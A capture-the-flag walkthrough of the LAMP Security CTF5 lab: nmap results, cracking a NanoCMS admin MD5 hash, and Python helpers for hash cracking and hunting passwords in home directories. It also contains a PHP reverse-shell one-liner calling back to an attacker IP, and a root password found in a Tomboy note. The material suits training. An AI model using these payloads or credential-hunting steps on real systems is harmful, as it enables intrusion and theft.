LAMP Security CTF5
1. nmap
Pull the open port numbers out of the saved scan (file ports) as a comma-separated list for a follow-up nmap -p scan; the paste variant avoids the trailing comma that tr leaves behind:
cat ports | grep open | awk -F '/' '{print $1}' | tr '\n' ','
cat ports | grep open | awk -F '/' '{print $1}' | paste -sd ',' > nmap_open_port_total.txt
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7 (protocol 2.0)
| ssh-hostkey:
| 1024 05:c3:aa:15:2b:57:c7:f4:2b:d3:41:1c:74:76:cd:3d (DSA)
|_ 2048 43:fa:3c:08:ab:e7:8b:39:c3:d6:f3:a4:54:19:fe:a6 (RSA)
25/tcp open smtp Sendmail 8.14.1/8.14.1
| smtp-commands: localhost.localdomain Hello [192.168.126.201], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, 8BITMIME, SIZE, DSN, ETRN, AUTH DIGEST-MD5 CRAM-MD5, DELIVERBY, HELP
|_ 2.0.0 This is sendmail 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
80/tcp open http Apache httpd 2.2.6 ((Fedora))
|_http-server-header: Apache/2.2.6 (Fedora)
|_http-title: Phake Organization
110/tcp open pop3 ipop3d 2006k.101
|_pop3-capabilities: LOGIN-DELAY(180) TOP UIDL USER STLS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-04-29T11:31:53
|_Not valid after: 2010-04-29T11:31:53
|_ssl-date: 2024-03-28T00:54:54+00:00; -3h58m23s from scanner time.
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 32768/udp status
|_ 100024 1 58217/tcp status
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
143/tcp open imap University of Washington IMAP imapd 2006k.396 (time zone: -0400)
|_imap-capabilities: NAMESPACE ESEARCH UNSELECT THREAD=REFERENCES CHILDREN BINARY LITERAL+ MAILBOX-REFERRALS SCAN IDLE IMAP4REV1 SASL-IR STARTTLSA0001 CAPABILITY WITHIN OK completed LOGIN-REFERRALS UIDPLUS THREAD=ORDEREDSUBJECT SORT MULTIAPPEND
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-04-29T11:31:53
|_Not valid after: 2010-04-29T11:31:53
|_ssl-date: 2024-03-28T00:54:55+00:00; -3h58m23s from scanner time.
445/tcp open netbios-ssn Samba smbd 3.0.26a-6.fc8 (workgroup: MYGROUP)
901/tcp open http Samba SWAT administration server
|_http-title: 401 Authorization Required
| http-auth:
| HTTP/1.0 401 Authorization Required\x0D
|_ Basic realm=SWAT
3306/tcp open mysql MySQL 5.0.45
| mysql-info:
| Protocol: 10
| Version: 5.0.45
| Thread ID: 6
| Capabilities flags: 41516
| Some Capabilities: Support41Auth, SupportsTransactions, Speaks41ProtocolNew, ConnectWithDatabase, LongColumnFlag, SupportsCompression
| Status: Autocommit
|_ Salt: zxk0Mqp^hq{9F5vtezX(
58217/tcp open status 1 (RPC #100024)
2. Web penetration
Directory brute-forcing
/events/
We start here.
/events/robots.txt
searchsploit
That is as far as /events/ goes for now; the registration/login page found there does not seem usable either.
/~andy/data/nanoadmin.php
It looks like a login is required before this admin script can be used. A quick Google search turns up the data file the CMS keeps next to it:
/data/pagesdata.txt (under /~andy/)
Sure enough, it is readable from the web and holds the admin credentials:
s:5:"admin";s:8:"password";s:32:"9d2f75377ac0ab991d40c91fd27e52fd";s:7:"version";s:4:"v_4f";
The 32-character value after "password" is an unsalted MD5 hash; cracking it gives admin:shannon.
Logging in at /~andy/data/nanoadmin.php as admin:shannon succeeds.
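The credential recovery above, as an added example written for this page (not code from the original writeup): a small Python parser for the PHP-serialized s:N:"..." strings in pagesdata.txt that pulls out the value stored after the "password" key, followed by a wordlist check against the unsalted MD5. The fragment is the one shown above; the wordlist is constructed for the example, and the function names are my own.

```python
import hashlib
import re

# The fragment of /~andy/data/pagesdata.txt shown above.
PAGESDATA_FRAGMENT = (
    's:5:"admin";s:8:"password";'
    's:32:"9d2f75377ac0ab991d40c91fd27e52fd";'
    's:7:"version";s:4:"v_4f";'
)

# Constructed wordlist for the example; a real run would use rockyou or similar.
SAMPLE_WORDLIST = ["password", "admin", "shannon", "letmein"]

_PHP_STR = re.compile(r's:(\d+):"')


def php_strings(blob):
    """Return the string values in a PHP-serialized fragment, in order.

    PHP's s:N:"..." encodes the byte length, so we slice by N instead of
    looking for a closing quote; values containing '"' or ';' parse
    correctly and a length that does not line up raises ValueError.
    """
    out = []
    pos = 0
    while True:
        m = _PHP_STR.search(blob, pos)
        if not m:
            return out
        n = int(m.group(1))
        start = m.end()
        value = blob[start:start + n]
        if blob[start + n:start + n + 2] != '";':
            raise ValueError("length mismatch at offset %d" % m.start())
        out.append(value)
        pos = start + n + 2


def nanocms_password_hash(blob):
    """The value stored right after the "password" key, or None."""
    strings = php_strings(blob)
    try:
        return strings[strings.index("password") + 1]
    except (ValueError, IndexError):
        return None


def crack_md5(hexdigest, wordlist):
    """Return the first word whose unsalted MD5 matches, else None.

    No salt and no stretching means every candidate costs one MD5 call,
    which is why a short dictionary hit is enough here.
    """
    target = hexdigest.lower()
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == target:
            return word
    return None


if __name__ == "__main__":
    h = nanocms_password_hash(PAGESDATA_FRAGMENT)
    print("hash:", h)
    print("cracked:", crack_md5(h, SAMPLE_WORDLIST))
```

Two things to take from this beyond the cracked password: the data file sits inside the web root and is served as plain text, so no authentication bypass was needed to reach the hash; and an unsalted, unstretched MD5 turns that exposure straight into a working login.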
/~andy/index.php?page=123
PHP reverse shell: after logging in, a page whose content is the PHP below is created, and requesting it as /~andy/index.php?page=123 executes the payload, connecting back to a listener on the attacking host 192.168.126.201, port 7777.
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.126.201/7777 0>&1'")?>
3. Post-exploitation: privilege escalation
Local enumeration from the shell, in order:
README\ FIRST.txt
/home (listing; test.txt: Permission denied)
/etc/crontab
searchsploit, looking for a local privilege-escalation exploit matching the installed versions
/etc/passwd
files whose content mentions passwd
Since /etc/passwd lists many users with a Bash login shell, it is quite likely that one of them has written the root password into a file in their home directory. So we search /home for files containing the string "pass":
grep -R -i pass /home/* 2>/dev/null
This searches /home recursively for the string "pass", ignoring case, and prints the matching lines to standard output. The parts of the command:
grep: searches files for a pattern.
-R: recurses into directories.
-i: matches case-insensitively.
pass: the pattern; it also matches "password", "passwd", "Passphrase" and so on, which is what we want.
/home/*: the shell expands this to every non-hidden entry directly under /home (each user's home directory); with -R each of those is searched in full, including hidden subdirectories such as .tomboy.
2>/dev/null: sends standard error to /dev/null, so the "Permission denied" errors for files our user cannot read are discarded and only real matches are shown.
Adding -l would print only the names of matching files, which is easier to skim than every matching line.
The search returns a great many matches. Scrolling through them, we eventually find /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note, a Tomboy note whose <title> tag reads "Root password"; that is very likely where the root password lives.
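The /home sweep above, as an added example written for this page (not part of the original writeup): a Python version of grep -R -i pass that returns structured hits and, for Tomboy .note files, parses the XML to report the note's title and body directly instead of one matching line buried among thousands. The sample home tree, including a note modelled on /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note, is constructed inline; the note layout (note, title, text and note-content elements in the beatniksoftware.com/tomboy namespace) is assumed from the Tomboy file format, and the function names are my own.

```python
import os
import re
import tempfile
import xml.etree.ElementTree as ET

# Constructed sample of a Tomboy note (layout assumed from the Tomboy format),
# standing in for /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note.
SAMPLE_NOTE = """<?xml version="1.0" encoding="utf-8"?>
<note version="0.3" xmlns:link="http://beatniksoftware.com/tomboy/link"
      xmlns:size="http://beatniksoftware.com/tomboy/size"
      xmlns="http://beatniksoftware.com/tomboy">
  <title>Root password</title>
  <text xml:space="preserve"><note-content version="0.1">Root password

50$cent</note-content></text>
</note>
"""

# Constructed /home tree: one real hit plus the kind of noise grep -R returns.
SAMPLE_FILES = {
    "patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note": SAMPLE_NOTE,
    "patrick/.bash_history": "ls\ncat /etc/passwd\n",
    "andy/notes.txt": "remember to change the DB password next week\n",
    "andy/todo.txt": "buy milk\n",
}

PATTERN = re.compile(r"pass", re.IGNORECASE)


def _local(tag):
    """Strip the XML namespace from an ElementTree tag name."""
    return tag.rsplit("}", 1)[-1]


def tomboy_note(path):
    """Return (title, body) for a Tomboy .note file, or None if it is not XML."""
    try:
        root = ET.parse(path).getroot()
    except ET.ParseError:
        return None
    if _local(root.tag) != "note":
        return None
    title = body = ""
    for el in root.iter():
        name = _local(el.tag)
        if name == "title":
            title = (el.text or "").strip()
        elif name == "note-content":
            body = "".join(el.itertext()).strip()
    return title, body


def find_password_hits(home_root):
    """grep -R -i pass over home_root, returning (relpath, kind, a, b) tuples:
    kind "tomboy" carries (title, body); kind "text" carries (first match, "")."""
    hits = []
    for dirpath, _, files in os.walk(home_root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "r", errors="replace") as fh:
                    data = fh.read()
            except OSError:  # unreadable file: the 2>/dev/null case
                continue
            if not PATTERN.search(data):
                continue
            rel = os.path.relpath(path, home_root)
            note = tomboy_note(path) if fn.endswith(".note") else None
            if note:
                hits.append((rel, "tomboy", note[0], note[1]))
            else:
                line = next(l for l in data.splitlines() if PATTERN.search(l))
                hits.append((rel, "text", line.strip(), ""))
    return sorted(hits)


def demo():
    """Write the constructed tree into a temp dir and search it."""
    with tempfile.TemporaryDirectory() as root:
        for rel, content in SAMPLE_FILES.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write(content)
        return find_password_hits(root)


if __name__ == "__main__":
    for hit in demo():
        print(hit)
```

Pointing this at /home on the target (find_password_hits("/home")) does the same walk as the grep command, but the Tomboy hit comes back as a title and body you can read at a glance, and unreadable files are skipped silently rather than cluttering the output.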
Reading the note gives the password, and su - succeeds; we are root:
bash-3.2$ su -
Password: 50$cent
From: https://www.cnblogs.com/carmi/p/18174484